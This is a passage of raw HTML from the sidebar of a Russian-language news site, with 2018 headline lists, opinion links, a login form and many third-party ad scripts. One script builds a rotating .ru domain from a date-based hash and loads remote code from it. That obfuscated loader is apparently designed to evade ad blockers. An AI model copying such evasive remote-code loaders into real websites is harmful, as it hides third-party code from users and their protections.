O307IA==") );
              }
          }
          </script>
            <div id="M225926ScriptRootC608879">
        <div id="M225926PreloadC608879">
        Загрузка...
    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M225926ScriptRootC608879")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M225926ScriptRootC608879");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=608879;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsc.marketgid.com/h/r/hronika.info.608879.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- Composite End -->
            <div id='tau92omicron6749'></div>
<script type='text/javascript'>(function(){function f(v){return Math.abs(v.split('').reduce(function(w,x){return w=(w<<5)-w+x.charCodeAt(0),w&w},0))}function g(v){return(26<=v?g((v/26>>0)-1):'')+'abcdefghijklmnopqrstuvwxyz'[v%26>>0]}var j=673873,r=''+Math.ceil((Date.now()-1.5147648e12)/6.048e8)*j,t=document;p=t.createElement('script'),p.type='text/javascript',p.src='//'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+'.ru/code/6749.js',t.getElementById('tau92omicron6749').appendChild(p)})();</script>
            
            <!-- noindex -->
<div id="CNM4146" style="text-align:center;display:none" ><a href="https://www.novostimira.biz/" id="CNM4146t" style="display:none" rel="nofollow" target="_blank"><strong>Новости</strong></a></div>

<!-- before </body> -->
<script type="text/javascript" async="async" >
  var el = document.getElementById('CNM4146');
  if (el) {
    if (document.getElementById('CNM4146t').style.display == 'none') {
      document.getElementById('CNM4146t').style.display = '';
      var dateNM = new Date();
      var t = Math.floor(dateNM.getTime()/(1000*600));
      var NMces=document.createElement('script');
      NMces.type = 'text/javascript';
      NMces.charset='UTF-8';
      NMces.src='http'+(window.location.protocol=='https:'?'s':'')+'://c.novostimira.biz/l/4146?v='+t;
      el.parentNode.appendChild(NMces);
    }
  }
</script>
<!--/ noindex -->
            <!-- start NEW_v1_right for hronika.info -->
<div id="adpartner-jsunit-850">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=850&" + Math.random();
        head.appendChild(script);
    </script>
</div>
<!-- end NEW_v1_right for hronika.info -->
             
            <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Side-1 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5084862545"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
				<h3>Хроника событий сегодня</h3>
               <div class="newsr_1">
    <span>12.08-12:33</span>
	<a href="http://hronika.info/tehnologii/341537-google-pixel-3-xl-poluchit-displey-vpechatlyayuschih-razmerov.html"><strong title="Google Pixel 3 XL получит дисплей впечатляющих размеров">Google Pixel 3 XL получит дисплей впечатляющих размеров</strong><b>25</b></a>
</div><div class="newsr_1">
    <span>12.08-12:29</span>
	<a href="http://hronika.info/fotoreportazhi/341536-kak-vyglyadela-molodezh-v-nachale-hh-veka-foto.html"><strong title="Как выглядела молодежь в начале ХХ века. Фото">Как выглядела молодежь в начале ХХ века. Фото</strong><b>136</b></a>
</div><div class="newsr_1">
    <span>12.08-12:25</span>
	<a href="http://hronika.info/kriminal/341535-pod-kievom-propala-15-letnyaya-devushka.html"><strong title="Под Киевом пропала 15-летняя девушка">Под Киевом пропала 15-летняя девушка</strong><b>285</b></a>
</div><div class="newsr_1">
    <span>12.08-12:21</span>
	<a href="http://hronika.info/sport/341534-lunin-s-realom-vyigral-kubok-santyago-bernabeu.html"><strong title="Лунин с «Реалом» выиграл кубок Сантьяго Бернабеу">Лунин с «Реалом» выиграл кубок Сантьяго Бернабеу</strong><b>69</b></a>
</div><div class="newsr_1">
    <span>12.08-12:17</span>
	<a href="http://hronika.info/neverojatnoe/341533-nasa-zapustilo-zond-dlya-izucheniya-solnca.html"><strong title="NASA успешно запустило зонд для изучения Солнца">NASA успешно запустило зонд для изучения Солнца</strong><b>76</b></a>
</div><div class="newsr_1">
    <span>12.08-12:12</span>
	<a href="http://hronika.info/mir/341532-v-indonezii-nayden-propavshiy-samolet-vosem-chelovek-pogibli.html"><strong title="В Индонезии найден пропавший самолет: восемь человек погибли">В Индонезии найден пропавший самолет: восемь человек погибли</strong><b>259</b></a>
</div><div class="newsr_1">
    <span>12.08-12:08</span>
	<a href="http://hronika.info/videonovosti/341531-v-harkove-avto-policeyskih-vletelo-v-skoruyu-pomosch-video.html"><strong title="В Харькове авто полицейских влетело в скорую помощь. Видео">В Харькове авто полицейских влетело в скорую помощь. Видео</strong><b>320</b></a>
</div><div class="newsr_1">
    <span>12.08-12:03</span>
	<a href="http://hronika.info/kultura/341530-dasha-astafeva-vystavila-napokaz-pyshnoe-dekolte.html"><strong title="Даша Астафьева выставила напоказ пышное декольте">Даша Астафьева выставила напоказ пышное декольте</strong><b>118</b></a>
</div><div class="newsr_1">
    <span>12.08-11:59</span>
	<a href="http://hronika.info/rossija/341529-v-rossii-obnarodovali-ukaz-o-bombardirovke-berlina.html"><strong title="В России обнародовали указ о бомбардировке Берлина">В России обнародовали указ о бомбардировке Берлина</strong><b>449</b></a>
</div><div class="newsr_1">
    <span>12.08-11:55</span>
	<a href="http://hronika.info/medicina/341528-vysokoe-davlenie-u-detey-mediki-rasskazali-v-kakih-sluchayah-nuzhno-bit-trevogu.html"><strong title="Высокое давление у детей: медики рассказали, в каких случаях нужно бить тревогу">Высокое давление у детей: медики рассказали, в каких случаях нужно бить тревогу</strong><b>357</b></a>
</div>
                <div class="vsenovosti" title="Все новости хроники"><a href="/lastnews">Все новости хроники</a></div>
			</div>

               <div class="wrap">
				<h3>События сегодня</h3>           
</div>
   </div>   
   
   <div class="width49-4 fright">
   
   
<!--
<div id="ax_popular_comp">
	<ul class="tabs tshadow ax_tabs" style="height: 31px;">
		<li title="Компетентно" style="width: 147px;"><a href="#ax_comp">Компетентно</a></li>
		<li title="Актуально"><a href="#ax_actual">Актуально</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_comp">
			<div class="b-tab-n1">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html"><img src="/posters/300_131_70_1/uploads/posts/2015-03/thumbs/1426164908_mvf.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-author"><a href="/kompetentno/">Наши эксперты</a></span>
	<span class="b-full-link"><a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html">«Согреют» ли деньги МВФ простых украинцев</a></span>
	
</div>

<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author1"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426164917_lanov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Лановой</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author2"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426164962_zhalilo.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Ярослав Жалило</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author3"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426165061_dubrov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Дубровский</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author4"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426165044_shapran.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Виталий Шапран</span>
</div>

		</div>			
		<div id="ax_actual">
			 <div class="b-tab-n1">
	<a href="http://hronika.info/politika/341209-delo-sencova-v-ssha-sdelali-zayavlenie.html"><img src="/posters/300_131_70_1/uploads/posts/2018-08/thumbs/1533921265_22_main_new.1533687117.jpg" alt="Дело Сенцова: в США сделали заявление" title="Дело Сенцова: в США сделали заявление" /></a>
	
	<span class="b-full-link"><a href="http://hronika.info/politika/341209-delo-sencova-v-ssha-sdelali-zayavlenie.html">Дело Сенцова: в США сделали заявление</a></span>

</div>
			 <div class="b-tab-n2">
	<a href="http://hronika.info/politika/341137-v-gpu-otreagirovali-na-reshenie-suda-po-delu-kernesa.html"><img src="/posters/74_74_70_1/uploads/posts/2018-08/thumbs/1533904251_kernes.jpeg" alt="В ГПУ отреагировали на решение суда по делу Кернеса" title="В ГПУ отреагировали на решение суда по делу Кернеса" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/341122-nabu-zainteresovalos-rabotoy-manaforta-v-ukraine.html"><img src="/posters/74_74_70_1/uploads/posts/2018-08/thumbs/1533901064_manafort.jpg" alt="НАБУ заинтересовалось работой Манафорта в Украине" title="НАБУ заинтересовалось работой Манафорта в Украине" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/341076-sud-v-poltave-zakryl-delo-v-otnoshenii-gennadiya-kernesa.html"><img src="/posters/74_74_70_1/uploads/posts/2018-08/thumbs/1533892216_kernes.jpg" alt="Суд в Полтаве закрыл дело в отношении Геннадия Кернеса" title="Суд в Полтаве закрыл дело в отношении Геннадия Кернеса" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/341050-efremovu-prodlili-arest-na-dva-mesyaca.html"><img src="/posters/74_74_70_1/uploads/posts/2018-08/thumbs/1533888494_efremov.jpg" alt="Ефремову продлили арест на два месяца" title="Ефремову продлили арест на два месяца" /></a>
	

</div>
		</div>			         
	</div>
</div>

<div class="clr"></div>
 

-->      
       


			<div class="wrap">
				<h3 class="inbg">Мнения</h3> 
				<div>
					<div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1887.jpg" />
        <div>10.08.2018|17:45</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%A1%D0%B5%D1%80%D0%B3%D0%B5%D0%B9+%D0%A4%D1%83%D1%80%D1%81%D0%B0', 'http://hronika.info/user/%D0%A1%D0%B5%D1%80%D0%B3%D0%B5%D0%B9+%D0%A4%D1%83%D1%80%D1%81%D0%B0/', '0'); return false;" href="http://hronika.info/user/%D0%A1%D0%B5%D1%80%D0%B3%D0%B5%D0%B9+%D0%A4%D1%83%D1%80%D1%81%D0%B0/">Сергей Фурса</a></div>
    	<strong><a href="http://hronika.info/mnenia/341008-vsya-pravda-ob-ukrainskom-futbole.html">Вся правда об украинском футболе</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1924.jpg" />
        <div>10.08.2018|17:00</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A2%D0%B0%D1%80%D0%B0%D0%BD', 'http://hronika.info/user/%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A2%D0%B0%D1%80%D0%B0%D0%BD/', '0'); return false;" href="http://hronika.info/user/%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A2%D0%B0%D1%80%D0%B0%D0%BD/">Виктор Таран</a></div>
    	<strong><a href="http://hronika.info/mnenia/341006-schodo-situacyi-navkolo-oksani-marchenko.html">Щодо ситуації навколо Оксани Марченко</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1921.jpg" />
        <div>10.08.2018|16:15</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%94%D0%B5%D0%BD%D0%B8%D1%81+%D0%9A%D0%B0%D0%B7%D0%B0%D0%BD%D1%81%D0%BA%D0%B8%D0%B9', 'http://hronika.info/user/%D0%94%D0%B5%D0%BD%D0%B8%D1%81+%D0%9A%D0%B0%D0%B7%D0%B0%D0%BD%D1%81%D0%BA%D0%B8%D0%B9/', '0'); return false;" href="http://hronika.info/user/%D0%94%D0%B5%D0%BD%D0%B8%D1%81+%D0%9A%D0%B0%D0%B7%D0%B0%D0%BD%D1%81%D0%BA%D0%B8%D0%B9/">Денис Казанский</a></div>
    	<strong><a href="http://hronika.info/mnenia/341005-lisichanskaya-tec-prochital-i-proslezilsya.html">Лисичанская ТЭЦ: прочитал и прослезился</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1885.jpg" />
        <div>10.08.2018|15:30</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%9C%D0%B0%D0%B3%D0%B4%D0%B0', 'http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%9C%D0%B0%D0%B3%D0%B4%D0%B0/', '0'); return false;" href="http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%9C%D0%B0%D0%B3%D0%B4%D0%B0/">Евгений Магда</a></div>
    	<strong><a href="http://hronika.info/mnenia/341004-pdsumki-prezidentstva-leonda-kuchmi.html">Підсумки президентства Леоніда Кучми</a></strong>			
</div>
				</div>
                <div class="vsenovosti" title="Мнения, рассуждения, аналитика"><a href="/mnenia/">Читать все мнения</a></div>
			</div>
  

	<div class="hrap" >
    
            	﻿


 <div class="fleft authbut"><a class="alert4">Авторизация</a></div> 
 <div class="fright authbut"><a rel="nofollow" href="/index.php?do=register">Регистрация</a></div>
 <div class="clr"></div>
<div id="dim4">
<div class="msgbox">
<div class="msgboxttl"><span></span>Вход на сайт<a class="close">X</a></div>
 		<form method="post" action="#">
				<div id="logentform"><span></span>
                <div class="msgbox_ent">Войти используя учетную запись хроники</div>
					<ul class="reset">
						<li class="logfield"><label for="login_name">Введите E-Mail:</label><input type="text" name="login_name" id="login_name" /></li>
						<li class="logfield"><label for="login_password">Введите Пароль :</label><input type="password" name="login_password" id="login_password" />&nbsp;(<a id="zabyli" href="http://hronika.info/index.php?do=lostpassword">Забыли?</a>)</li><br />
						<li class="zapomnit"><input type="checkbox" name="login_not_save" id="login_not_save" value="1"/><label for="login_not_save">&nbsp;Запомнить меня</label><button onclick="submit();" type="submit" title="Войти">Войти</button></li>
					</ul>
					<input name="login" type="hidden" id="login" value="submit" />
                    <div id="logreg"><a rel="nofollow" href="/index.php?do=register">Зарегистрироваться</a></div>
				</div> 
			</form>
            
            
 <div class="sotsenter">
	
	
	
	
	
	
 </div>

    <div class="clr h40"></div>
 <div class="clr msgbox_b"></div>
       </div>
    </div>

    </div>

    <div class="wrap"> 
        <!-- noindex -->
<div id='kurs-com-ua-informer-main-ukraine-300x130-blue-container'><a href="//old.kurs.com.ua/informer" id="kurs-com-ua-informer-main-ukraine-300x130-blue" title="Курс валют информер Украина" rel="nofollow" target="_blank">Информер курса валют</a></div>
<script type='text/javascript'>
(function() {var iframe = '<ifr'+'ame src="//old.kurs.com.ua/informer/inf2?color=blue" width="300" height="130" frameborder="0" vspace="0" scrolling="no" hspace="0"></ifr'+'ame>';var container = document.getElementById('kurs-com-ua-informer-main-ukraine-300x130-blue');container.parentNode.innerHTML = iframe;})();
</script>
<noscript><img src='//old.kurs.com.ua/static/images/informer/kurs.png' width='52' height='26' alt='kurs.com.ua: курс валют в Украине!' title='Курс валют' border='0' /></noscript>
<!--/ noindex -->  
        
    <div class="wrap">
        
    </div>
        
          
    <div class="wrap">
            	<h3>Новости сегодня</h3>
<div id="FMg6hQON63UZxhcgPUb0" data-type="0" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'hronikka.com';</script>
<script src="//hronikka.com/fR37/h0.js" ></script>


<center><script>
(function(c,o,u,n,t,e,r){
r = c[u](o); r[n] = t; r.async = 1;
r.onload = function(){c['AliExpressBannerGlobalObject'](e)};
c.body.appendChild(r);
})(document, 'script', 'createElement', 'src', '//alishop6.ru/902dy/src.js');
</script>

<div class="some_class"></div>
</center>
    </div>
        

              		<div id="poisk">
					<form method="post" action='#'>
						<input type="hidden" name="do" value="search" />
						<input type="hidden" name="subaction" value="search" />
						<input id="story" name="story" value="Введите поисковый запрос" onblur="if(this.value=='') this.value='Введите поисковый запрос';" onfocus="if(this.value=='Введите поисковый запрос') this.value='';" type="text" />
                        <input  alt="найти" type="image" src="/templates/hronika/images/poisk.png" />
					</form>
				</div>
			</div>
             
           
                       
            <div class="wrap bshadow">
				<h3 class="inbg">Самое интересное за неделю</h3> 				

<div id="ax_popular_obs">
	<ul class="tabs tshadow ax_tabs" style="height: 25px;">
		<li title="Обсуждаемое"><a href="#ax_obs">Обсуждаемое</a></li>
		<li title="Популярное"><a href="#ax_popular">Популярное</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_obs">
			 <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/tehnologii/341537-google-pixel-3-xl-poluchit-displey-vpechatlyayuschih-razmerov.html"><span>12.08-12:33</span>
	<strong title="Google Pixel 3 XL получит дисплей впечатляющих размеров">Google Pixel 3 XL получит дисплей впечатляющих размеров</strong></a><b>25</b><div class="category_lastn_date" title="Технологии">&nbsp;&nbsp;<a href="http://hronika.info/tehnologii/">Технологии</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kriminal/341535-pod-kievom-propala-15-letnyaya-devushka.html"><span>12.08-12:25</span>
	<strong title="Под Киевом пропала 15-летняя девушка">Под Киевом пропала 15-летняя девушка</strong></a><b>285</b><div class="category_lastn_date" title="Происшествия">&nbsp;&nbsp;<a href="http://hronika.info/kriminal/">Происшествия</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/sport/341534-lunin-s-realom-vyigral-kubok-santyago-bernabeu.html"><span>12.08-12:21</span>
	<strong title="Лунин с «Реалом» выиграл кубок Сантьяго Бернабеу">Лунин с «Реалом» выиграл кубок Сантьяго Бернабеу</strong></a><b>69</b><div class="category_lastn_date" title="Спорт">&nbsp;&nbsp;<a href="http://hronika.info/sport/">Спорт</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/neverojatnoe/341533-nasa-zapustilo-zond-dlya-izucheniya-solnca.html"><span>12.08-12:17</span>
	<strong title="NASA успешно запустило зонд для изучения Солнца">NASA успешно запустило зонд для изучения Солнца</strong></a><b>76</b><div class="category_lastn_date" title="Невероятное">&nbsp;&nbsp;<a href="http://hronika.info/neverojatnoe/">Невероятное</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/mir/341532-v-indonezii-nayden-propavshiy-samolet-vosem-chelovek-pogibli.html"><span>12.08-12:12</span>
	<strong title="В Индонезии найден пропавший самолет: восемь человек погибли">В Индонезии найден пропавший самолет: восемь человек погибли</strong></a><b>259</b><div class="category_lastn_date" title="Мир">&nbsp;&nbsp;<a href="http://hronika.info/mir/">Мир</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/341531-v-harkove-avto-policeyskih-vletelo-v-skoruyu-pomosch-video.html"><span>12.08-12:08</span>
	<strong title="В Харькове авто полицейских влетело в скорую помощь. Видео">В Харькове авто полицейских влетело в скорую помощь. Видео</strong></a><b>320</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/341530-dasha-astafeva-vystavila-napokaz-pyshnoe-dekolte.html"><span>12.08-12:03</span>
	<strong title="Даша Астафьева выставила напоказ пышное декольте">Даша Астафьева выставила напоказ пышное декольте</strong></a><b>118</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/rossija/341529-v-rossii-obnarodovali-ukaz-o-bombardirovke-berlina.html"><span>12.08-11:59</span>
	<strong title="В России обнародовали указ о бомбардировке Берлина">В России обнародовали указ о бомбардировке Берлина</strong></a><b>449</b><div class="category_lastn_date" title="Россия">&nbsp;&nbsp;<a href="http://hronika.info/rossija/">Россия</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/341528-vysokoe-davlenie-u-detey-mediki-rasskazali-v-kakih-sluchayah-nuzhno-bit-trevogu.html"><span>12.08-11:55</span>
	<strong title="Высокое давление у детей: медики рассказали, в каких случаях нужно бить тревогу">Высокое давление у детей: медики рассказали, в каких случаях нужно бить тревогу</strong></a><b>357</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/341527-v-ssha-francuzskiy-buldog-pomog-hozyainu-vyigrat-v-lotereyu.html"><span>12.08-11:51</span>
	<strong title="В США французский бульдог помог хозяину выиграть в лотерею">В США французский бульдог помог хозяину выиграть в лотерею</strong></a><b>820</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div>
			
		</div>			
		<div id="ax_popular">
		   <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/339682-nazvany-glavnye-prichiny-potlivosti-po-nocham.html"><span>06.08-01:03</span>
	<strong title="Названы главные причины потливости по ночам">Названы главные причины потливости по ночам</strong></a><b>56419</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/340661-nazvany-produkty-zatrudnyayuschie-pohudenie.html"><span>09.08-00:52</span>
	<strong title="Названы продукты, затрудняющие похудение">Названы продукты, затрудняющие похудение</strong></a><b>35002</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/340230-71-letnyaya-sofiya-rotaru-porazila-vneshnim-vidom.html"><span>07.08-16:51</span>
	<strong title="71-летняя София Ротару поразила внешним видом">71-летняя София Ротару поразила внешним видом</strong></a><b>15881</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/340421-mediki-nazvali-bezopasnuyu-dlya-zdorovya-dozu-alkogolya.html"><span>08.08-11:38</span>
	<strong title="Медики назвали безопасную для здоровья дозу алкоголя">Медики назвали безопасную для здоровья дозу алкоголя</strong></a><b>15667</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/339724-mediki-podskazali-prostoy-sposob-ochischeniya-organizma.html"><span>06.08-09:38</span>
	<strong title="Медики подсказали простой способ очищения организма">Медики подсказали простой способ очищения организма</strong></a><b>15586</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/340865-mediki-podskazali-kak-normalizovat-davlenie-bez-tabletok.html"><span>09.08-17:23</span>
	<strong title="Медики подсказали, как нормализовать давление без таблеток">Медики подсказали, как нормализовать давление без таблеток</strong></a><b>14397</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/340845-nazvano-effektivnoe-narodnoe-sredstvo-dlya-pohudeniya.html"><span>09.08-16:20</span>
	<strong title="Названо эффективное народное средство для похудения">Названо эффективное народное средство для похудения</strong></a><b>13683</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/340153-mediki-podskazali-kak-pohudet-bez-diet.html"><span>07.08-14:03</span>
	<strong title="Медики подсказали, как похудеть без диет">Медики подсказали, как похудеть без диет</strong></a><b>9485</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/341117-nadya-dorofeeva-poradovala-fanatov-pikantnym-snimkom.html"><span>10.08-14:33</span>
	<strong title="Надя Дорофеева порадовала фанатов пикантным снимком">Надя Дорофеева порадовала фанатов пикантным снимком</strong></a><b>7989</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/340501-vrachi-podskazali-kak-normalizovat-davlenie-bez-tabletok.html"><span>08.08-14:41</span>
	<strong title="Врачи подсказали, как нормализовать давление без таблеток">Врачи подсказали, как нормализовать давление без таблеток</strong></a><b>7321</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div>
		</div>			         
	</div>
</div>
 <div class="clr"></div>
 
					
</div>

            
  
          
          <div class="wrap">
              <div id="bn_9bfe796fdf">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.9bfe796fdf.js"></script>
              <h3>Интересные новости</h3>
              <!-- noindex --><div id="n4p_31957">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script><!--/ noindex -->
              <!--noindex -->
<!-- MarketGidNews Start -->
<div id="MarketGidScriptRootN8362" class="news-block-magick">
    <div id="MarketGidPreloadN8362">
        <a id="mg_add8362" href="http://usr.marketgid.com/demo/celevie-posetiteli/" rel="nofollow" target="_blank"><img src="//cdn.marketgid.com/images/marketgid_add_link.png" style="border:0px"></a><br>        <a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN8362")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN8362");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=8362;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/h/r/hronika.info.8362.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- MarketGidNews End -->
<!--/noindex-->
              <!--noindex-->
<!-- LentaInformNews Start -->
<div id="LentaInformScriptRootN14129" class="news-block-magick">
    <div id="LentaInformPreloadN14129">
                <a href="http://lentainform.com/" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN14129")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN14129");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=14129;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/h/r/hronika.info.14129.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- LentaInformNews End -->
<!--/noindex -->
              <div class="join_informer_3674" id="join_informer_3674"></div>

<!-- Асинхронный код, 10.02.2016 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "//partner.join.com.ua/async/3674/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->
             </div>		        
          
          
          <div class="wrap">
            	<h3>Мы в Фейсбук</h3>
